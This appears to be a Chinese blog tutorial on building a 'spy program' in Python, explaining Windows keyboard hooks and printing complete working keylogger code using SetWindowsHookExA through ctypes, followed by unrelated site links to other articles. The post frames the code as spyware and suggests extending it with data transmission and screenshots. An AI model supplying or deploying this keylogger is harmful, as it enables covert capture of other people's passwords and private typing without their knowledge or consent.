使用Python打造一款间谍程序的流程分析


Posted in Python onFebruary 21, 2020

知识点

这次我们使用python来打造一款间谍程序

程序中会用到许多知识点,大致分为四块

win32API 此处可以在MSDN上查看

Python基础重点在cpytes库的使用,使用方法请点击此处

C语言基础

Hook

程序的基本原理在于通过注册Hook,记录系统事件

那么什么是Hook呢

Hook 技术又叫做钩子函数,系统在调用函数之前,钩子程序就先捕获该消息,钩子函数先得到控制权,这时钩子函数既可以加工处理(改变)该函数的执行行为,还可以强制结束消息的传递

注册Hook时我们需要先导入DLL库,在Python中我们使用ctypes来导入,导入方法如下

user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")

我们导入了user32.dll和kernel32.dll

这两个DLL有什么用处呢

user32.dll

是Windows用户界面相关应用程序接口,用于包括Windows处理,基本用户界面等特性,如创建窗口和发送消息

kernel32.dll

控制着系统的内存管理、数据的输入输出操作和中断处理

流程部分

知道了我们要使用什么样的工具,那么第一步应该怎么做呢

1.首先我们需要先注册Hook到系统上,通过user32.dll中的SetWindowsHookExA函数,我们可以在系统上注册钩子

HHOOK SetWindowsHookExA(
 int idHook,
 HOOKPROC lpfn,
 HINSTANCE hmod,
 DWORD dwThreadId
);

通过查看文档我们看到SetWindowsHookExA函数的参数及参数类型如上所示,详细文档点击此链接查看

通过文档我们看到第一个参数idHook中填入钩子的类型

WH_KEYBOARD_LL的常量值为13代表的意思是监视低级键盘输入事件,我们此处来监听键盘事件

第二个参数lpfn代表指向钩子过程的指针,要填入钩子过程(函数),我们可以在此处来添加额外代码达到我们想要达成的目的

第三个参数hmod表示为DLL句柄,我们可以使用kernel32中的GetModuleHandleW来获取句柄

最后一个参数dwThreadId我们填入0代表与同一桌面上所有的线程关联

代码如下

user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)

如何使用Python来编写我们的钩子过程呢,通过ctypes文档我们可以得知windows下使用WINFUNCTYPE来创建函数

此时我们发现有WINFUNCTYPE和CFUNCTYPE两个函数,具体要使用哪一个呢,这两个的区别为

WINFUNCTYPE

为Windows下独有的,通过使用使用stdcall调用约定的函数

CFUNCTYPE

 使用标准C调用约定的函数

HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))

因为我们调用的是WH_KEYBOARD_LL,WH_KEYBOARD_LL会使用LowLevelKeyboardProc回调函数,同时我们也需要在Python定义它

LowLevelKeyboardProc数据结构如下

LRESULT CALLBACK LowLevelKeyboardProc(
 _In_ int nCode,
 _In_ WPARAM wParam,
 _In_ LPARAM lParam
);

按照官方文档提示如果nCode小于零,则挂钩过程必须将消息传递给CallNextHookEx函数,而无需进一步处理,并且应返回CallNextHookEx返回的值

我们转换为Python代码

class KBDLLHOOKSTRUCT(Structure):
 _fields_ = [
 ('vkCode', DWORD),
 ('scanCode', DWORD),
 ('flags', DWORD),
 ('time', DWORD),
 ('dwExtraInfo', DWORD)]

def hookProc(nCode, wParam, lParam):
 if nCode < 0:
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
 else:
 # 此处插入我们的代码
 pass
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

最后在我们退出程序时还需要删除Hook,不然大量的Hook会使系统运行缓慢,虽然在Windows 7及更高版本上,该钩子会被静默删除而不被调用。应用程序无法知道挂钩是否已删除。我们还是主动进行删除

删除需要使用user32.dll的UnhookWindowsHookEx,参数为Hook句柄

user32.UnhookWindowsHookEx(hooked)

下面贴上全部代码

import sys
from ctypes import *
from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")
class KBDLLHOOKSTRUCT(Structure):
 _fields_ = [
 ('vkCode', DWORD),
 ('scanCode', DWORD),
 ('flags', DWORD),
 ('time', DWORD),
 ('dwExtraInfo', DWORD)]
def uninstallHookProc(hooked):
 if hooked is None:
 return
 user32.UnhookWindowsHookEx(hooked)
 hooked = None
def hookProc(nCode, wParam, lParam):
 if nCode < 0:
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
 else:
 if wParam == 256:
 if 162 == lParam.contents.value:
 print("Ctrl pressed, call Hook uninstall()")
 uninstallHookProc(hooked)
 sys.exit(-1)
 capsLock = user32.GetKeyState(20)
 # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT))
 if lParam.contents.value==13:
 print("\n")
 elif capsLock:
 print(chr(lParam.contents.value),end="")
 else:
 print(chr(lParam.contents.value+32),end="")
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
def startKeyLog():
 msg = MSG()
 user32.GetMessageA(byref(msg), 0, 0, 0)
def installHookProc(hooked, pointer):
 hooked = user32.SetWindowsHookExA(
 13,
 pointer,
 kernel32.GetModuleHandleW(),
 0
 )
 if not hooked:
 return False
 return True
HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
pointer = HOOKPROC(hookProc)
hooked = None
if installHookProc(hooked, pointer):
 print("Hook installed")
 try:
 msg = MSG()
 user32.GetMessageA(byref(msg), 0, 0, 0)
 except KeyboardInterrupt as kerror:
 uninstallHookProc(hooked)
 print("Hook uninstall...")
else:
 print("Hook installed error")

贴上我们的效果图

使用Python打造一款间谍程序的流程分析

我们还可以再添加上额外的代码比如数据传输,截屏等等 ^_^

如何想要了解更多的只是请点击这里把 => 地址

总结

以上就是使用Python打造一款间谍程序的流程分析的详细内容,更多关于python间谍程序请关注三水点靠木其它相关文章!

Python 相关文章推荐
对变量赋值的理解--Pyton中让两个值互换的实现方法
Nov 29 Python
python实现kNN算法
Dec 20 Python
Python3 queue队列模块详细介绍
Jan 05 Python
python实现根据文件关键字进行切分为多个文件的示例
Dec 10 Python
python日志logging模块使用方法分析
May 23 Python
tensorflow 自定义损失函数示例代码
Feb 05 Python
python实现ip地址的包含关系判断
Feb 07 Python
Python文件操作方法详解
Feb 09 Python
python中使用input()函数获取用户输入值方式
May 03 Python
python语音识别指南终极版(有这一篇足矣)
Sep 09 Python
Python使用pickle进行序列化和反序列化的示例代码
Sep 22 Python
解决pip安装tensorflow中出现的no module named tensorflow.python 问题方法
Feb 20 Python
python实现堆排序的实例讲解
Feb 21 #Python
Python中的sys.stdout.write实现打印刷新功能
Feb 21 #Python
Python控制台输出时刷新当前行内容而不是输出新行的实现
Feb 21 #Python
python编程进阶之异常处理用法实例分析
Feb 21 #Python
python编程进阶之类和对象用法实例分析
Feb 21 #Python
Python面向对象中类(class)的简单理解与用法分析
Feb 21 #Python
Python利用 utf-8-sig 编码格式解决写入 csv 文件乱码问题
Feb 21 #Python
You might like
英雄试炼之肉山谷—引领RPG新潮流
2020/04/20 DOTA
仿Aspnetpager的一个PHP分页类代码 附源码下载
2012/10/08 PHP
如何设置mysql允许外网访问
2013/06/04 PHP
PHP同时连接多个mysql数据库示例代码
2014/03/17 PHP
php数组中包含中文的排序方法
2014/06/03 PHP
php统计数组元素个数的方法
2015/07/02 PHP
Yii2中hasOne、hasMany及多对多关联查询的用法详解
2017/02/15 PHP
PHP完全二叉树定义与实现方法示例
2017/10/09 PHP
解决Laravel无法使用COOKIE和SESSION的问题
2019/10/16 PHP
北京奥运官方网站幻灯切换效果flash版打包下载
2008/01/30 Javascript
使用堆实现Top K算法(JS实现)
2015/12/25 Javascript
bootstrap下拉列表与输入框组结合的样式调整
2016/10/08 Javascript
javascript中对象的定义、使用以及对象和原型链操作小结
2016/12/14 Javascript
Angularjs单选框相关的示例代码
2017/08/17 Javascript
react组件从搭建脚手架到在npm发布的步骤实现
2019/01/09 Javascript
简单谈谈python中的lambda表达式
2018/01/19 Python
Python numpy中矩阵的基本用法汇总
2019/02/12 Python
Python检测数据类型的方法总结
2019/05/20 Python
Django框架教程之中间件MiddleWare浅析
2019/12/29 Python
Tensorflow的梯度异步更新示例
2020/01/23 Python
深入浅析Python 命令行模块 Click
2020/03/11 Python
基于python实现破解滑动验证码过程解析
2020/05/28 Python
详解python安装matplotlib库三种失败情况
2020/07/28 Python
python selenium xpath定位操作
2020/09/01 Python
HTML5 CSS3给网站设计带来出色效果
2009/07/16 HTML / CSS
Yankee Candle官网:美国最畅销蜡烛品牌之一
2020/01/05 全球购物
十佳大学生村官事迹
2014/01/09 职场文书
校园活动宣传方案
2014/03/28 职场文书
收入及婚姻状况证明
2014/11/20 职场文书
2015年春训学习心得体会范文
2015/03/09 职场文书
2016年校园重阳节广播稿
2015/12/18 职场文书
2019年度开业庆典祝福语大全!
2019/07/05 职场文书
redis调用二维码时的不断刷新排查分析
2022/04/01 Redis
KVM基础命令详解
2022/04/30 Servers
一文了解Java动态代理的原理及实现
2022/07/07 Java/Android
MySQL 原理与优化之原数据锁的应用
2022/08/14 MySQL